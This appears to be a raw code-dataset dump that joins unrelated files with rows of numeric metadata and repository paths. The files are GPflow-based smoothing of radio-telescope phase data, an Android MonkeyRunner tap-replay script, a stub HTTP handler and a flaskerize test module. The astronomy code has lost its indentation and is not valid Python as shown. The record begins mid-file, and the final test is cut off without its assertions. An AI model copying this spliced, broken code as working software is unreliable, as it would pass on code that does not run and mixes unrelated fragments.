m.likelihood.prior = gp.priors.Gaussian(0,1/3.)
m.compile()
iterations=1000
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
print(m)
y,var = m.predict_y(Xs)
y = y*y_std + y_mean
y = y.reshape((Nt,1))
var = var*y_std**2
std = np.sqrt(var).reshape((Nt,1))
fig,ax = plt.subplots(nrows=1,ncols=1,figsize=(8,8))
[ax.scatter(times,length_scales[i,:],marker='+',c='black',alpha=0.15) for i in range(length_scales.shape[0])]
ax.plot(times,length_scales.mean(0),lw=2,ls='--',color='red',label='antenna average')
ax.plot(times,y[:,0],color='blue',label='Bayes')
ax.fill_between(times,y[:,0]+std[:,0],y[:,0]-std[:,0],alpha=0.25,color='blue')
ax.set_ylim([0.,700.])
ax.set_xlabel('Time (mjd)')
ax.set_ylabel('Phase screen temporal correlation scale (seconds)')
ax.legend()
plt.tight_layout()
plt.savefig(results_file.replace('.npz','_temporal_scale_timeonly.png'))
plt.show()
# antenna, time, 1
l_time = y.copy()
###
# var scale
# antenna, time
length_scales = np.log10(data['kern_var'][:,:,0])
y_mean = length_scales.mean()
y_std = length_scales.std()
times = data['time']
time_mean = times.mean()
time_std = times.std()
labels = data['antenna']
array_center = ac.ITRS(np.mean(antennas.data))
enu = ENU(location = array_center)
ants_enu = antennas.transform_to(enu)
positions = np.array([ants_enu.east.to(au.km).value[1:], ants_enu.north.to(au.km).value[1:]]).T
pos_mean = positions.mean(0)
positions -= pos_mean
pos_std = positions.std(0).mean()
positions /= pos_std
Nt,Np = times.shape[0],positions.shape[0]
X = np.zeros([Np,Nt,1],dtype=np.float64)
for j in range(Nt):
for k in range(Np):
X[k,j,0] = (times[j] - time_mean)/time_std
# X[j,k,1:3] = positions[k,:]
X = np.reshape(X,(Nt*Np,1))
Xs = (times[:,None] - time_mean)/time_std
Y = (length_scales.reshape((-1,1)) - y_mean)/y_std
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
with gp.defer_build():
k_time = gp.kernels.RBF(1,active_dims = [0],lengthscales=[0.5])
kern = k_time
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian(),
Z=Z, num_latent=1, minibatch_size=500, whiten=True)
m.feature.set_trainable(False)
k_time.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
m.likelihood.prior = gp.priors.Gaussian(0,1/3.)
m.compile()
iterations=1000
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
print(m)
y,var = m.predict_y(Xs)
y = y*y_std + y_mean
y = y.reshape((Nt,1))
var = var*y_std**2
std = np.sqrt(var).reshape((Nt,1))
fig,ax = plt.subplots(nrows=1,ncols=1,figsize=(8,8))
[ax.scatter(times,length_scales[i,:],marker='+',c='black',alpha=0.15) for i in range(length_scales.shape[0])]
ax.plot(times,length_scales.mean(0),lw=2,ls='--',color='red',label='antenna average')
ax.plot(times,y[:,0],color='blue',label='Bayes')
ax.fill_between(times,y[:,0]+std[:,0],y[:,0]-std[:,0],alpha=0.25,color='blue')
ax.set_xlabel('Time (mjd)')
ax.set_ylabel('Phase screen log-variance correlation scale (mag.rad.)')
ax.legend()
plt.tight_layout()
plt.savefig(results_file.replace('.npz','_variance_scale_timeonly.png'))
plt.show()
return np.concatenate([l_space,l_time],axis=-1)
def refine_statistics(self,results_file):
plt.style.use('ggplot')
antennas,antenna_labels = self.datapack.get_antennas(-1)
data = np.load(results_file)
# antenna, time
length_scales = data['kern_ls'][:,:,0]
y_mean = length_scales.mean()
y_std = length_scales.std()
times = data['time']
time_mean = times.mean()
time_std = times.std()
labels = data['antenna']
array_center = ac.ITRS(np.mean(antennas.data))
enu = ENU(location = array_center)
ants_enu = antennas.transform_to(enu)
positions = np.array([ants_enu.east.to(au.km).value[1:], ants_enu.north.to(au.km).value[1:]]).T
pos_mean = positions.mean(0)
positions -= pos_mean
pos_std = positions.std(0).mean()
positions /= pos_std
Nt,Np = times.shape[0],positions.shape[0]
X = np.zeros([Np,Nt,3],dtype=np.float64)
for j in range(Nt):
for k in range(Np):
X[k,j,0] = (times[j] - time_mean)/time_std
X[k,j,1:3] = positions[k,:]
X = np.reshape(X,(Nt*Np,3))
Y = (length_scales.reshape((-1,1)) - y_mean)/y_std
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
with gp.defer_build():
k_time = gp.kernels.RBF(1,active_dims = [0],lengthscales=[0.5])
k_space = gp.kernels.RBF(2,active_dims = [1,2],lengthscales=[0.5])
kern = k_time*k_space
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian(),
Z=Z, num_latent=1, minibatch_size=500, whiten=True)
m.feature.set_trainable(False)
k_time.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
k_space.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
m.likelihood.prior = gp.priors.Gaussian(0,1/3.)
m.compile()
iterations=2000
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
print(m)
y,var = m.predict_y(X)
y = y*y_std + y_mean
y = y.reshape((Np,Nt,1))
var = var*y_std**2
std = np.sqrt(var).reshape((Np,Nt,1))
fig,ax = plt.subplots(nrows=1,ncols=1,figsize=(8,8))
[ax.scatter(times,length_scales[i,:],marker='+',c='black',alpha=0.15) for i in range(y.shape[0])]
[ax.plot(times,y[i,:,0],color='blue',lw = 2.,label='Bayes'if i == 0 else None,alpha=0.5) for i in range(61)]
# [ax.fill_between(times,y[i,:,0]+0.5*std[i,:,0],y[i,:,0]-0.5*std[i,:,0],alpha=0.1,color='blue',label='Bayes'if i == 0 else None) for i in range(61)]
ax.plot(times,length_scales.mean(0),lw=2,ls='--',color='red',label='antenna average')
#ax.fill_between(times,y[0,:,0]+std[0,:,0],y[0,:,0]-std[0,:,0],alpha=0.25,color='blue')
ax.set_ylim([0.25,2.75])
ax.set_xlabel('Time (mjd)')
ax.set_ylabel('Phase screen directional correlation scale (deg)')
ax.legend()
plt.tight_layout()
plt.savefig(results_file.replace('.npz','_directional_scale.png'))
plt.show()
# antenna, time
length_scales = data['kern_ls'][:,:,1]
y_mean = length_scales.mean()
y_std = length_scales.std()
times = data['time']
time_mean = times.mean()
time_std = times.std()
labels = data['antenna']
array_center = ac.ITRS(np.mean(antennas.data))
enu = ENU(location = array_center)
ants_enu = antennas.transform_to(enu)
positions = np.array([ants_enu.east.to(au.km).value[1:], ants_enu.north.to(au.km).value[1:]]).T
pos_mean = positions.mean(0)
positions -= pos_mean
pos_std = positions.std(0).mean()
positions /= pos_std
Nt,Np = times.shape[0],positions.shape[0]
X = np.zeros([Np,Nt,3],dtype=np.float64)
for j in range(Nt):
for k in range(Np):
X[k,j,0] = (times[j] - time_mean)/time_std
X[k,j,1:3] = positions[k,:]
X = np.reshape(X,(Nt*Np,3))
Y = (length_scales.reshape((-1,1)) - y_mean)/y_std
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
with gp.defer_build():
k_time = gp.kernels.RBF(1,active_dims = [0],lengthscales=[0.5])
k_space = gp.kernels.RBF(2,active_dims = [1,2],lengthscales=[0.5])
kern = k_time*k_space
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian(),
Z=Z, num_latent=1, minibatch_size=500, whiten=True)
m.feature.set_trainable(False)
k_time.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
k_space.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
m.likelihood.prior = gp.priors.Gaussian(0,1/3.)
m.compile()
iterations=2000
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
print(m)
y,var = m.predict_y(X)
y = y*y_std + y_mean
y = y.reshape((Np,Nt,1))
var = var*y_std**2
std = np.sqrt(var).reshape((Np,Nt,1))
fig,ax = plt.subplots(nrows=1,ncols=1,figsize=(8,8))
[ax.scatter(times,length_scales[i,:],marker='+',c='black',alpha=0.15) for i in range(y.shape[0])]
[ax.plot(times,y[i,:,0],color='blue',lw = 2.,label='Bayes'if i == 0 else None,alpha=0.5) for i in range(61)]
# [ax.fill_between(times,y[i,:,0]+0.5*std[i,:,0],y[i,:,0]-0.5*std[i,:,0],alpha=0.1,color='blue',label='Bayes'if i == 0 else None) for i in range(61)]
ax.plot(times,length_scales.mean(0),lw=2,ls='--',color='red',label='antenna average')
#ax.fill_between(times,y[0,:,0]+std[0,:,0],y[0,:,0]-std[0,:,0],alpha=0.25,color='blue')
ax.set_ylim([0.,700.])
ax.set_xlabel('Time (mjd)')
ax.set_ylabel('Phase screen temporal correlation scale (seconds)')
ax.legend()
plt.tight_layout()
plt.savefig(results_file.replace('.npz','_temporal_scale.png'))
plt.show()
###
# var correlation scale
# antenna, time
length_scales = np.log10(data['kern_var'][:,:,0])
y_mean = length_scales.mean()
y_std = length_scales.std()
times = data['time']
time_mean = times.mean()
time_std = times.std()
labels = data['antenna']
array_center = ac.ITRS(np.mean(antennas.data))
enu = ENU(location = array_center)
ants_enu = antennas.transform_to(enu)
positions = np.array([ants_enu.east.to(au.km).value[1:], ants_enu.north.to(au.km).value[1:]]).T
pos_mean = positions.mean(0)
positions -= pos_mean
pos_std = positions.std(0).mean()
positions /= pos_std
Nt,Np = times.shape[0],positions.shape[0]
X = np.zeros([Np,Nt,3],dtype=np.float64)
for j in range(Nt):
for k in range(Np):
X[k,j,0] = (times[j] - time_mean)/time_std
X[k,j,1:3] = positions[k,:]
X = np.reshape(X,(Nt*Np,3))
Y = (length_scales.reshape((-1,1)) - y_mean)/y_std
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
with gp.defer_build():
k_time = gp.kernels.RBF(1,active_dims = [0],lengthscales=[0.5])
k_space = gp.kernels.RBF(2,active_dims = [1,2],lengthscales=[0.5])
kern = k_time*k_space
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, Y, kern, mean_function = mean,
likelihood=gp.likelihoods.Gaussian(),
Z=Z, num_latent=1, minibatch_size=500, whiten=True)
m.feature.set_trainable(False)
k_time.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
k_space.lengthscales.prior = gp.priors.Gaussian(0,1/3.)
m.likelihood.prior = gp.priors.Gaussian(0,1/3.)
m.compile()
iterations=2000
gp.train.AdamOptimizer(0.01).minimize(m, maxiter=iterations)
print(m)
y,var = m.predict_y(X)
y = y*y_std + y_mean
y = y.reshape((Np,Nt,1))
var = var*y_std**2
std = np.sqrt(var).reshape((Np,Nt,1))
fig,ax = plt.subplots(nrows=1,ncols=1,figsize=(8,8))
[ax.scatter(times,length_scales[i,:],marker='+',c='black',alpha=0.15) for i in range(y.shape[0])]
[ax.plot(times,y[i,:,0],color='blue',lw = 2.,label='Bayes'if i == 0 else None,alpha=0.5) for i in range(61)]
# [ax.fill_between(times,y[i,:,0]+0.5*std[i,:,0],y[i,:,0]-0.5*std[i,:,0],alpha=0.1,color='blue',label='Bayes'if i == 0 else None) for i in range(61)]
ax.plot(times,length_scales.mean(0),lw=2,ls='--',color='red',label='antenna average')
#ax.fill_between(times,y[0,:,0]+std[0,:,0],y[0,:,0]-std[0,:,0],alpha=0.25,color='blue')
#ax.set_ylim([0.,700.])
ax.set_xlabel('Time (mjd)')
ax.set_ylabel('Phase screen log-variance correlation scale (mag.rad.)')
ax.legend()
plt.tight_layout()
plt.savefig(results_file.replace('.npz','_variance_scale.png'))
plt.show()
return
def solve_time_intervals(self, save_file, ant_idx, time_idx, dir_idx, freq_idx, interval, shift, num_threads=1,verbose=False, refined_params = None):
"""
Solve for kernel characteristics over given domain.
ant_idx, time_idx, dir_idx, freq_idx: the domain selectors
interval: int interval in time to solve.
shift: int the shift in time between solves.
num_threads: int (default 1) the number of parallel solvers.
Return interval start array, interval end array,
the kernel length scales per antenna and variances per antenna
"""
datapack = self.datapack
directions, patch_names = datapack.get_directions(dir_idx)
times,timestamps = datapack.get_times(time_idx)
antennas,antenna_labels = datapack.get_antennas(ant_idx)
freqs = datapack.get_freqs(freq_idx)
if ant_idx is -1:
ant_idx = range(len(antennas))
if time_idx is -1:
time_idx = range(len(times))
if freq_idx is -1:
freq_idx = range(len(freqs))
if dir_idx is -1:
dir_idx = range(len(directions))
phase = datapack.get_phase(ant_idx,time_idx,dir_idx,freq_idx)
Na,Nt,Nd,Nf = phase.shape
logging.warning("Working on shapes {}".format(phase.shape))
assert interval <= Nt
variance = datapack.get_variance(ant_idx,time_idx,dir_idx,freq_idx)
error = np.sqrt(variance)
data_mask = variance < 0
error[data_mask] = 10.
logging.warning("Total masked phases: {}".format(np.sum(data_mask)))
uvw = UVW(location=datapack.radio_array.get_center(), obstime=times[0],
phase=datapack.get_center_direction())
dirs_uvw = directions.transform_to(uvw)
#already centered on zero
# d = np.array([np.arctan2(dirs_uvw.u.value, dirs_uvw.w.value),
# np.arctan2(dirs_uvw.v.value, dirs_uvw.w.value)]).T
d = np.array([directions.ra.deg, directions.dec.deg]).T
t = times.gps
f = freqs
directional_sampling = 1
time_sampling = 1
freq_sampling = 1
directional_slice = slice(0,Nd,directional_sampling)
freq_slice = slice(0,Nf,freq_sampling)
lock = Lock()
with futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
jobs = []
for i,ai in enumerate(ant_idx):
for j,aj in enumerate(time_idx[::shift]):
start = j*shift
stop = min(start+interval,Nt)
time_slice = slice(start,stop,time_sampling)
if refined_params is not None:
init = refined_params[j,:]
else:
init = [None,None]
jobs.append(executor.submit(
Smoothing._solve_block_svgp,
phase[i,time_slice,directional_slice,freq_slice],
error[i,time_slice,directional_slice,freq_slice],
(t[time_slice],d[directional_slice],f[freq_slice]),
lock,
init=init,
pargs="Working on {} time chunk ({}) {} to ({}) {}".format(antenna_labels[i],
start,timestamps[start],stop-1,timestamps[stop-1]),
verbose=verbose
)
)
ref_dist = []
for j,aj in enumerate(time_idx[::shift]):
start = j*shift
stop = min(start+interval,Nt)
ref_dist.append(self._ref_distance(
antennas, i0=0))
ref_dist = np.stack(ref_dist,axis=0)
results = futures.wait(jobs)
if verbose:
logging.warning(results)
Nt_ = len(jobs)//Na
kern_lengthscales = np.zeros([Na,Nt_,3])
kern_variances = np.zeros([Na,Nt_,1])
mean_time = np.zeros(Nt_)
results = [j.result() for j in jobs]
res_idx = 0
for i,ai in enumerate(ant_idx):
for j,aj in enumerate(time_idx[::shift]):
start = j*interval
stop = min((j+1)*interval,Nt)
time_slice = slice(start,stop,time_sampling)
mean_time[j] = np.mean(t[time_slice])
res = results[res_idx]
res_idx += 1
kern_lengthscales[i,j,:] = res[0]
kern_variances[i,j,0] = res[1]
np.savez(save_file,**{"kern_ls":kern_lengthscales,"kern_var":kern_variances,"time":mean_time,"antenna":antenna_labels,"ref_dist":ref_dist})
def _apply_block_svgp(phase, error, coords, lock, kern_params,pargs=None,verbose=False):
try:
if verbose:
logging.warning("{}".format(pargs))
error_scale = np.mean(np.abs(phase))*0.1/np.mean(error)
if verbose:
logging.warning("Error scaling {}".format(error_scale))
Nt,Nd,Nf = phase.shape
y_mean = np.mean(phase)
y_scale = np.std(phase) + 1e-6
y = (phase - y_mean)/y_scale
y = y.flatten()[:,None]
var = (error/y_scale*error_scale)**2
var = var.flatten()
t,d,f = coords
assert len(t) == Nt and len(d) == Nd and len(f) == Nf
t_scale = np.max(t) - np.min(t) + 1e-6
d_scale = np.std(d - np.mean(d,axis=0),axis=0).mean() + 1e-6
f_scale = np.max(f) - np.min(f) + 1e-6
t = (t - np.mean(t))/(t_scale)
d = (d - np.mean(d,axis=0))/(d_scale)
f = (f - np.mean(f))/(f_scale)
X = Smoothing._make_coord_array(t,d,f)
M = 100
Z = kmeans2(X, M, minit='points')[0]
with tf.Session(graph=tf.Graph()) as sess:
lock.acquire()
try:
with gp.defer_build():
k_space = gp.kernels.RBF(2,active_dims = [0,1],lengthscales=[kern_params[0]/d_scale])
k_space.lengthscales.set_trainable(False)
k_time = gp.kernels.RBF(1,active_dims = [2],lengthscales=[kern_params[1]/t_scale])
k_time.lengthscales.set_trainable(False)
k_freq = gp.kernels.RBF(1,active_dims = [3], lengthscales=[kern_params[2]/f_scale])
k_freq.lengthscales.set_trainable(False)
## just set k_space, rest to 1.0
k_space.variance = kern_params[3]
k_space.variance.set_trainable(False)
k_time.variance = 1.0
k_time.variance.set_trainable(False)
k_freq.variance = 1.0
k_freq.variance.set_trainable(False)
kern = k_space * k_time * k_freq
mean = gp.mean_functions.Zero()#Constant()
m = gp.models.svgp.SVGP(X, y, kern, mean_function = mean,
likelihood=Gaussian_v2(Y_var=var, trainable=False),
Z=Z, num_latent=1, minibatch_size=100, whiten=True)
m.feature.set_trainable(False)
m.kern.rbf_1.lengthscales.prior = gp.priors.Gaussian(1./d_scale,0.5/d_scale)
m.kern.rbf_2.lengthscales.prior = gp.priors.Gaussian(0,1./3.)
m.kern.rbf_3.lengthscales.set_trainable(False)
m.compile()
finally:
lock.release()
iterations=200
gp.train.AdamOptimizer(0.09).minimize(m, maxiter=iterations)
if verbose:
logging.warning(m)
for l,fs in enumerate(f):
if verbose:
logging.warning("Predicting freq {} MHz".format(coords[2][l]/1e6))
Xs = Smoothing._make_coord_array(t,d,np.array([fs]))
logging.warning("{}".format(Xs.shape))
ystar,varstar = m.predict_y(Xs)
logging.warning("{} {}".format(ystar.shape,varstar.shape))
ystar = ystar.reshape([Nt,Nd,1]) * y_scale + y_mean
varstar = varstar.reshape([Nt,Nd,1]) * y_scale**2
# set in the originial array (use locking)
lock.acquire()
try:
phase[...,l] = ystar
error[...,l] = np.sqrt(varstar)
finally:
lock.release()
return phase, error**2
except Exception as e:
print(e)
def apply_solutions(self, save_datapack, solution_params, ant_idx, time_idx, dir_idx, freq_idx, interval, shift, num_threads=1,verbose=False):
data = np.load(solution_params)
kern_ls = data['kern_ls']
kern_var = data['kern_var']
kern_times = data['time']
kern_antenna_labels = data['antenna']
datapack = self.datapack
directions, patch_names = datapack.get_directions(dir_idx)
times,timestamps = datapack.get_times(time_idx)
antennas,antenna_labels = datapack.get_antennas(ant_idx)
freqs = datapack.get_freqs(freq_idx)
if ant_idx is -1:
ant_idx = range(len(antennas))
if time_idx is -1:
time_idx = range(len(times))
if freq_idx is -1:
freq_idx = range(len(freqs))
if dir_idx is -1:
dir_idx = range(len(directions))
phase = datapack.get_phase(ant_idx,time_idx,dir_idx,freq_idx)
Na,Nt,Nd,Nf = phase.shape
logging.warning("Working on shapes {}".format(phase.shape))
assert interval <= Nt
variance = datapack.get_variance(ant_idx,time_idx,dir_idx,freq_idx)
error = np.sqrt(variance)
data_mask = variance < 0
error[data_mask] = 10.
logging.warning("Total masked phases: {}".format(np.sum(data_mask)))
uvw = UVW(location=datapack.radio_array.get_center(), obstime=times[0],
phase=datapack.get_center_direction())
dirs_uvw = directions.transform_to(uvw)
#already centered on zero
# d = np.array([np.arctan2(dirs_uvw.u.value, dirs_uvw.w.value),
# np.arctan2(dirs_uvw.v.value, dirs_uvw.w.value)]).T
d = np.array([directions.ra.deg, directions.dec.deg]).T
t = times.gps
f = freqs
directional_sampling = 1
time_sampling = 1
freq_sampling = 1
directional_slice = slice(0,Nd,directional_sampling)
freq_slice = slice(0,Nf,freq_sampling)
lock = Lock()
with futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
jobs = []
mean_count = np.zeros(phase.shape)
for i,ai in enumerate(ant_idx):
for j,aj in enumerate(time_idx[::shift]):
start = j*shift
stop = min(start+interval,Nt)
time_slice = slice(start,stop,time_sampling)
###
# interpolate kern_params with this interval/shift
mean_time = np.mean(times.gps[time_slice])
# d, t, f, v
kern_params = [
np.interp(mean_time, kern_times, kern_ls[i,:,0]),
np.interp(mean_time, kern_times, kern_ls[i,:,1]),
np.interp(mean_time, kern_times, kern_ls[i,:,2]),
np.interp(mean_time, kern_times, kern_var[i,:,0])
]
mean_count[i,time_slice,directional_slice,freq_slice] += 1
# for l,al in enumerate(freq_idx):
# freq_slice = slice(l,l+1)
jobs.append(executor.submit(
Smoothing._apply_block_svgp,
phase[i,time_slice,directional_slice,freq_slice].copy(),
error[i,time_slice,directional_slice,freq_slice].copy(),
(t[time_slice],d[directional_slice],f[freq_slice]),
lock,
kern_params=kern_params,
pargs="Working on {} time chunk ({}) {} to ({}) {} at {} to {} MHz".format(antenna_labels[i],
start,timestamps[start],stop-1,timestamps[stop-1], freqs[0]/1e6, freqs[-1]/1e6),
verbose=verbose
)
)
results = futures.wait(jobs)
if verbose:
logging.warning(results)
results = [j.result() for j in jobs]
phase_mean = np.zeros(phase.shape)
variance_mean = np.zeros(variance.shape)
res_idx = 0
for i,ai in enumerate(ant_idx):
for j,aj in enumerate(time_idx[::shift]):
start = j*interval
stop = min((j+1)*interval,Nt)
time_slice = slice(start,stop,time_sampling)
res = results[res_idx]
phase_mean[i,time_slice,directional_slice,freq_slice] += res[0]
variance_mean[i,time_slice,directional_slice,freq_slice] += res[1]
res_idx += 1
phase_mean /= mean_count
variance_mean /= mean_count
datapack.set_phase(phase_mean, ant_idx=ant_idx,time_idx=time_idx,dir_idx=dir_idx,freq_idx=freq_idx)
datapack.set_variance(variance_mean, ant_idx=ant_idx,time_idx=time_idx,dir_idx=dir_idx,freq_idx=freq_idx)
datapack.save(save_datapack)
if __name__=='__main__':
    # Entry point: smooth the phases of a datapack using previously solved
    # GP kernel hyperparameters ("gp_params_fixed_scales.npz"). The solve
    # and refine steps (solve_time_intervals / refine_statistics_timeonly)
    # must have been run beforehand to produce that file.
    if len(sys.argv) == 2:
        starting_datapack = sys.argv[1]
    else:
        starting_datapack = "../data/rvw_datapack_full_phase_dec27.hdf5"
    smoothing = Smoothing(starting_datapack)
    # Apply the solved kernel parameters to antennas 1..61, all times and
    # directions, the first 20 frequencies, in non-overlapping chunks of 32.
    smoothing.apply_solutions(starting_datapack.replace('.hdf5','_refined_smoothed.hdf5'),
            "gp_params_fixed_scales.npz",range(1,62), -1, -1, range(0,20), 32, 32, num_threads=1,verbose=True)
| 44.457561
| 160
| 0.533104
| 6,030
| 45,569
| 3.8733
| 0.066998
| 0.020551
| 0.01079
| 0.017983
| 0.817948
| 0.800437
| 0.77479
| 0.760233
| 0.74833
| 0.727308
| 0
| 0.028534
| 0.330137
| 45,569
| 1,024
| 161
| 44.500977
| 0.736609
| 0.06737
| 0
| 0.758788
| 0
| 0
| 0.033968
| 0.004701
| 0
| 0
| 0
| 0
| 0.004848
| 1
| 0.013333
| false
| 0
| 0.031515
| 0
| 0.055758
| 0.010909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0bbf82e4c0c6da55dff7e713740feb7448baf165
| 1,487
|
py
|
Python
|
utility/refined_events/chrome_record.py
|
EfficientAI/efficient_cv
|
e308f229e4d99da86ad56f87f3a78b2c81f27ca5
|
[
"MIT"
] | null | null | null |
utility/refined_events/chrome_record.py
|
EfficientAI/efficient_cv
|
e308f229e4d99da86ad56f87f3a78b2c81f27ca5
|
[
"MIT"
] | null | null | null |
utility/refined_events/chrome_record.py
|
EfficientAI/efficient_cv
|
e308f229e4d99da86ad56f87f3a78b2c81f27ca5
|
[
"MIT"
] | null | null | null |
from com.android.monkeyrunner import MonkeyRunner
from com.android.monkeyrunner import MonkeyDevice


def _replay_tap(device, x, y):
    """Tap (x, y) on the device, log the action, and pause 1 s for the UI."""
    device.touch(x, y, MonkeyDevice.DOWN_AND_UP)
    print('Executing : device.touch(%d, %d, MonkeyDevice.DOWN_AND_UP)' % (x, y))
    MonkeyRunner.sleep(1.0)


print('Connecting to device...')
device = MonkeyRunner.waitForConnection()
print('Connected to device')
# Reproduce action log from here
print('Start to reproduce action log')
# Recorded touch sequence (x, y). Bug fix: the log line for the
# (500, 1000) tap previously reported the wrong coordinates (982, 1112);
# deriving the message from the actual coordinates keeps them in sync.
for _x, _y in [(536, 1704), (536, 1268), (904, 140), (74, 128),
               (901, 132), (982, 1112), (500, 1000)]:
    _replay_tap(device, _x, _y)
device.press("KEYCODE_HOME", MonkeyDevice.DOWN_AND_UP)
print('Executing : device.press("KEYCODE_HOME", MonkeyDevice.DOWN_AND_UP)')
MonkeyRunner.sleep(1.0)
print('Finish to reproduce action log')
| 35.404762
| 75
| 0.791527
| 216
| 1,487
| 5.291667
| 0.194444
| 0.223972
| 0.265967
| 0.293963
| 0.826772
| 0.770779
| 0.770779
| 0.75853
| 0.486439
| 0.4007
| 0
| 0.077091
| 0.075319
| 1,487
| 42
| 76
| 35.404762
| 0.754182
| 0.020175
| 0
| 0.322581
| 0
| 0
| 0.413462
| 0.156593
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.064516
| 0
| 0.064516
| 0.387097
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f053441ed8995ad8a6e6d04676e1d494cae15c0a
| 381
|
py
|
Python
|
cloudframe/resource/v1/res01.py
|
cloudken/faas-worker
|
a8f09f47f7b6eea99f848a7d1783fef2fd29161e
|
[
"Apache-2.0"
] | null | null | null |
cloudframe/resource/v1/res01.py
|
cloudken/faas-worker
|
a8f09f47f7b6eea99f848a7d1783fef2fd29161e
|
[
"Apache-2.0"
] | null | null | null |
cloudframe/resource/v1/res01.py
|
cloudken/faas-worker
|
a8f09f47f7b6eea99f848a7d1783fef2fd29161e
|
[
"Apache-2.0"
] | null | null | null |
from six.moves import http_client
def post(tenant, req):
    """Handle resource creation for *tenant*; always acknowledges with OK."""
    return http_client.OK, {'status': 'OK'}
def put(tenant, res_id, req):
    """Handle an update of resource *res_id*; always acknowledges with OK."""
    return http_client.OK, {'status': 'OK'}
def get(tenant, res_id):
    """Handle a read of resource *res_id*; always acknowledges with OK."""
    return http_client.OK, {'status': 'OK'}
def delete(tenant, res_id):
    """Handle deletion of resource *res_id*; always acknowledges with OK."""
    return http_client.OK, {'status': 'OK'}
| 16.565217
| 33
| 0.622047
| 58
| 381
| 3.948276
| 0.327586
| 0.218341
| 0.19214
| 0.296943
| 0.720524
| 0.720524
| 0.720524
| 0.720524
| 0.720524
| 0.707424
| 0
| 0
| 0.225722
| 381
| 22
| 34
| 17.318182
| 0.776271
| 0
| 0
| 0.615385
| 0
| 0
| 0.084211
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.307692
| false
| 0
| 0.076923
| 0
| 0.692308
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
f06f2a805d6ae670d99aa40f21133b6206b60843
| 1,800
|
py
|
Python
|
flaskerize/schematics/setup/schematic_test.py
|
ehoeffner/flaskerize
|
cb887a80ae0a2c06f61cf941e029fd7174fdd233
|
[
"BSD-3-Clause"
] | 119
|
2019-05-07T00:48:58.000Z
|
2022-03-30T07:17:53.000Z
|
flaskerize/schematics/setup/schematic_test.py
|
ehoeffner/flaskerize
|
cb887a80ae0a2c06f61cf941e029fd7174fdd233
|
[
"BSD-3-Clause"
] | 36
|
2019-04-28T11:14:56.000Z
|
2022-03-28T16:09:21.000Z
|
flaskerize/schematics/setup/schematic_test.py
|
ehoeffner/flaskerize
|
cb887a80ae0a2c06f61cf941e029fd7174fdd233
|
[
"BSD-3-Clause"
] | 15
|
2019-08-29T17:38:28.000Z
|
2021-04-29T02:27:59.000Z
|
import os
def test_schematic(tmp_path):
    """Running the `fz generate setup` CLI should render the expected setup.py."""
    expected = """#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
    name="test",
    version="0.1.0",
    description="Project built by Flaskerize",
    author="AJ Pryor",
    author_email="apryor6@gmail.com",
    url="https://github.com/apryor6/flaskerize",
    packages=find_packages(),
    install_requires=['thingy>0.3.0', 'widget>=2.4.3', 'doodad>4.1.0'],
)"""
    target_dir = str(tmp_path)
    name = "test"
    command = f"""fz generate setup {name} --from-dir {target_dir} --install-requires 'thingy>0.3.0' 'widget>=2.4.3' 'doodad>4.1.0' --author 'AJ Pryor' --author-email 'apryor6@gmail.com'"""
    os.system(command)
    generated = os.path.join(tmp_path, "setup.py")
    assert os.path.isfile(generated)
    with open(generated, "r") as fh:
        assert fh.read() == expected
def test_schematic_from_Flaskerize(tmp_path):
    """Invoking the schematic via the Flaskerize API should render the same setup.py."""
    from flaskerize.parser import Flaskerize
    expected = """#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
    name="test",
    version="0.1.0",
    description="Project built by Flaskerize",
    author="AJ",
    author_email="apryor6@gmail.com",
    url="https://github.com/apryor6/flaskerize",
    packages=find_packages(),
    install_requires=['thingy>0.3.0', 'widget>=2.4.3', 'doodad>4.1.0'],
)"""
    target_dir = str(tmp_path)
    name = "test"
    command = f"""fz generate setup {name} --from-dir {target_dir} --install-requires thingy>0.3.0 widget>=2.4.3 doodad>4.1.0 --author AJ --author-email apryor6@gmail.com"""
    result = Flaskerize(command.split())
